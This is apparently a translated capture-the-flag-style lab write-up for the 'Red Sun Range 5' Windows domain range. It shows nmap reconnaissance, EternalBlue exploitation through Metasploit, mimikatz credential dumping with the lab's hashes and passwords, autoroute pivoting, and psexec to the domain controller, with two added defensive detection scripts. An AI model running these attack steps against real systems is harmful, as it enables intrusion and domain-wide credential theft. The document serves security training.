Red Sun Range 5 (红日靶场之五)


This lab uses two virtual machines, one external-facing and one internal, for practising red-team topics: routine information gathering, web attack and defence, code auditing, vulnerability exploitation, intranet penetration and domain penetration. The range exists for learning; please comply with the Cybersecurity Law.

win7

sun\heart 123.com
sun\Administrator dc123.com

Server 2008 (DC)

sun\admin 2022.com

External network penetration

Start Kali and run a quick nmap scan of the network; three IPs are shown.

nmap -sS 192.168.159.1/24

192.168.159.2 # VMware virtual NAT device
192.168.159.128 # Kali itself
192.168.159.129 # Windows host of unknown purpose
192.168.159.254 # gateway

Run a detailed scan of 192.168.159.129. It is Windows 7 SP1 with port 445 open; Win7 plus 445 means go straight for EternalBlue.

nmap -A 192.168.159.129

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:EF:55:69 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-09-20T08:11:41
|_ start_date: 2022-09-20T07:55:17
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7
| NetBIOS computer name: WIN7\x00
| Domain name: sun.com
| Forest name: sun.com
| FQDN: win7.sun.com
|_ System time: 2022-09-20T16:11:41+08:00
|_nbstat: NetBIOS name: WIN7, NetBIOS user: , NetBIOS MAC: 00:0c:29:ef:55:69 (VMware)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s

TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms 192.168.159.129
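As an added defender-side example (not part of the original writeup), the following parser turns the nmap host-script output above into triage findings: the conditions it flags (guest sessions, SMB1 signing disabled, SMB2 signing not required, a legacy OS family) are exactly the ones that make the EternalBlue path below viable. The sample text is a constructed excerpt modelled on the scan output.

```python
import re

# Constructed excerpt modelled on the nmap output above (not the full scan).
SAMPLE_NMAP = """\
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Domain name: sun.com
"""

# OS families that received MS17-010 as a separate patch; any of them exposing
# SMB without signing is worth a ticket regardless of the exploit outcome.
LEGACY_OS = ("Windows 7", "Windows Server 2008", "Windows XP", "Windows Vista")


def smb_findings(nmap_text):
    """Return (severity, message) tuples describing SMB exposure in nmap output."""
    findings = []
    # Strip the "| " / "|_ " script-output gutter so prefixes compare cleanly.
    lines = [l.lstrip("|_ ").strip() for l in nmap_text.splitlines()]
    if any(l.startswith("445/tcp open") for l in lines):
        findings.append(("info", "TCP/445 reachable from the scanning host"))
    if any(l.startswith("account_used: guest") for l in lines):
        findings.append(("medium", "SMB accepts guest/null sessions"))
    if any(l.startswith("message_signing: disabled") for l in lines):
        findings.append(("high", "SMB1 message signing disabled"))
    if any("Message signing enabled but not required" in l for l in lines):
        findings.append(("medium", "SMB2 signing not required"))
    for l in lines:
        m = re.match(r"OS: (.+)", l)  # smb-os-discovery line, not "OS CPE:"
        if m and any(fam in m.group(1) for fam in LEGACY_OS):
            findings.append(("high", "Legacy OS, verify MS17-010 patch state: " + m.group(1)))
            break
    return findings
```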

msfdb init # initialise the database
msfconsole # start msf
search ms17 # search for EternalBlue-related modules
use auxiliary/scanner/smb/smb_ms17_010 # EternalBlue scanner module
set rhost 192.168.159.129 # set the target
run # launch

[+] 192.168.159.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.159.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# The EternalBlue vulnerability is likely present

Start the attack

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.159.129 # set the target
run # launch

Information gathering

<meterpreter>
sysinfo

Computer : WIN7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : SUN
Logged On Users : 2
Meterpreter : x64/windows

ipconfig

Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:ef:55:69
MTU : 1500
IPv4 Address : 192.168.159.129
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c9aa:e02b:8b69:bd07
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 16
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:ef:55:73
MTU : 1500
IPv4 Address : 192.168.138.136
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::29a6:8a6f:d7cf:ecf2
IPv6 Netmask : ffff:ffff:ffff:ffff::

Dual NIC configuration:
external 192.168.159.129
internal 192.168.138.136
So there is a second, internal 138 segment to look at.

load kiwi # load the kiwi module (formerly mimikatz) in meterpreter
kiwi_cmd sekurlsa::logonpasswords # dump logon credentials

leo

Authentication Id : 0 ; 166135 (00000000:000288f7)
Session : Interactive from 1
User Name : leo
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 15:57:07
SID : S-1-5-21-3388020223-1982701712-4030140183-1110
msv :
[00000003] Primary
* Username : leo
* Domain : SUN
* LM : b73a13e9b7832a35aad3b435b51404ee
* NTLM : afffeba176210fad4628f0524bfe1942
* SHA1 : fa83a92197d9896cb41463b7a917528b4009c650
tspkg :
* Username : leo
* Domain : SUN
* Password : 123.com
wdigest :
* Username : leo
* Domain : SUN
* Password : 123.com
kerberos :
* Username : leo
* Domain : SUN.COM
* Password : 123.com
ssp :
credman :

Administrator

Authentication Id : 0 ; 382740 (00000000:0005d714)
Session : CachedInteractive from 1
User Name : Administrator
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 17:20:32
SID : S-1-5-21-3388020223-1982701712-4030140183-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SUN
* LM : c8c42d085b5e3da2e9260223765451f1
* NTLM : e8bea972b3549868cecd667a64a6ac46
* SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
tspkg :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
wdigest :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
kerberos :
* Username : Administrator
* Domain : SUN.COM
* Password : dc123.com
ssp :
credman :

External host 192.168.159.129 successfully taken.

Intranet penetration

Prepare msf routing:
meterpreter> run autoroute -s 192.168.138.0/24 # add a route to the 138 segment
meterpreter> run autoroute -s 192.168.159.0/24 # add a route back to the 159 segment

bg # move the session to the background

Intranet scanning

<msf>
use auxiliary/scanner/discovery/arp_sweep # ARP scanning module
set rhosts 192.168.138.0/24 # set the target
run # launch

# results
192.168.138.2 # VMware virtual NAT device
192.168.138.136 # the host we already have a shell on
192.168.138.138 # host of unknown type
Port scan
<msf>
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.138.138 # set the target
run # launch

Start the attack

Port 445 is open; Server 2008 plus 445, so try MS17-010 again.

<msf>
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.138.138
set lhost 192.168.159.129 # listener address on the pivot host (lhost, not lport)
set lport 6666
run

[*] Started reverse TCP handler on 192.168.159.129:6666 via the meterpreter on session 1
[*] 192.168.138.138:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.138.138:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)
[*] 192.168.138.138:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.138.138:445 - The target is vulnerable.
[-] 192.168.138.138:445 - Could not make SMBv1 connection

It failed. The reason is that even though Server 2008 has port 445 open, anonymous named pipes are disabled by default, so the 445 login fails and the exploit cannot be used.

No hurry; try another lateral movement method.

psexec

From the kiwi results dumped earlier on host 129:
the host is in a domain called SUN,
there is a leo account with password 123.com,
and an administrator account with password dc123.com.
Here we log in to SMB directly as administrator.

use exploit/windows/smb/psexec
set rhosts 192.168.138.138 # set the target
set SMBDomain SUN # set the domain
set SMBUser Administrator # set the account
set SMBPass dc123.com # set the password
set payload windows/meterpreter/bind_tcp # bind payload: the target listens and we connect in
run # launch
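As an added defender-side example (not part of the original writeup), the following correlates the trace this step leaves on the domain controller: a network logon with domain credentials (Security event 4624, logon type 3) from the pivot host, followed within seconds by a service installation (System event 7045). The event records and the random-looking service name are constructed; the simplified one-line rendering is an assumption, and a real deployment would read the fields from a SIEM.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the page): simplified renderings of
# Security 4624 and System 7045 records as "timestamp host event_id k=v ...".
SAMPLE_EVENTS = [
    "2022-09-20T17:30:01 DC 4624 LogonType=3 Account=SUN\\Administrator SrcIP=192.168.138.136",
    "2022-09-20T17:30:03 DC 7045 Service=XkTqLmPw ImagePath=%SystemRoot%\\XkTqLmPw.exe Account=LocalSystem",
    "2022-09-20T17:45:10 DC 4624 LogonType=3 Account=SUN\\admin SrcIP=192.168.138.50",
    "2022-09-20T18:02:00 DC 7045 Service=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe Account=LocalSystem",
]


def parse(line):
    """Split one rendered record into (timestamp, host, event_id, fields)."""
    ts, host, eid, rest = line.split(" ", 3)
    fields = dict(kv.split("=", 1) for kv in rest.split(" "))
    return datetime.fromisoformat(ts), host, int(eid), fields


def psexec_like(events, window_s=60):
    """Pair each 7045 service install with a preceding type-3 logon on the same
    host inside window_s seconds. Returns (host, account, src_ip, service)."""
    parsed = sorted((parse(l) for l in events), key=lambda e: e[0])
    hits = []
    for ts, host, eid, f in parsed:
        if eid != 7045:
            continue
        for ts2, host2, eid2, f2 in parsed:
            if (eid2 == 4624 and host2 == host and f2.get("LogonType") == "3"
                    and timedelta(0) <= ts - ts2 <= timedelta(seconds=window_s)):
                hits.append((host, f2["Account"], f2["SrcIP"], f["Service"]))
    return hits
```

The Spooler install in the sample is 17 minutes after the nearest network logon and is not reported, while the install two seconds after the Administrator logon from the pivot host is.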

Information gathering

<meterpreter>
sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : SUN
Logged On Users : 3
Meterpreter : x86/windows

# It is x86, which will not do; switch to an x64 process
# Pick any 64-bit SYSTEM process, for example this one, PID 332
332 272 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe

migrate 332
[*] Migrating from 2840 to 332...
[*] Migration completed successfully.

sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : SUN
Logged On Users : 3
Meterpreter : x64/windows
# Much better

Dump intranet passwords

<meterpreter>
load kiwi # load the kiwi module (formerly mimikatz) in meterpreter
kiwi_cmd sekurlsa::logonpasswords # dump logon credentials

admin

Authentication Id : 0 ; 132311 (00000000:000204d7)
Session : Interactive from 1
User Name : admin
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 15:57:27
SID : S-1-5-21-3388020223-1982701712-4030140183-1000
msv :
[00000003] Primary
* Username : admin
* Domain : SUN
* LM : 2832ea1cecc55ba41486235a2333e4d2
* NTLM : 7ca86fb63f8ac3995f565d297aaf0357
* SHA1 : 2761ddfcd8cedee1b6367a9b4812dc597a49c5ee
tspkg :
* Username : admin
* Domain : SUN
* Password : 2022.com
wdigest :
* Username : admin
* Domain : SUN
* Password : 2022.com
kerberos :
* Username : admin
* Domain : SUN.COM
* Password : 2022.com
ssp :
credman :

Internal host 192.168.138.138 and the domain controller account successfully taken.

End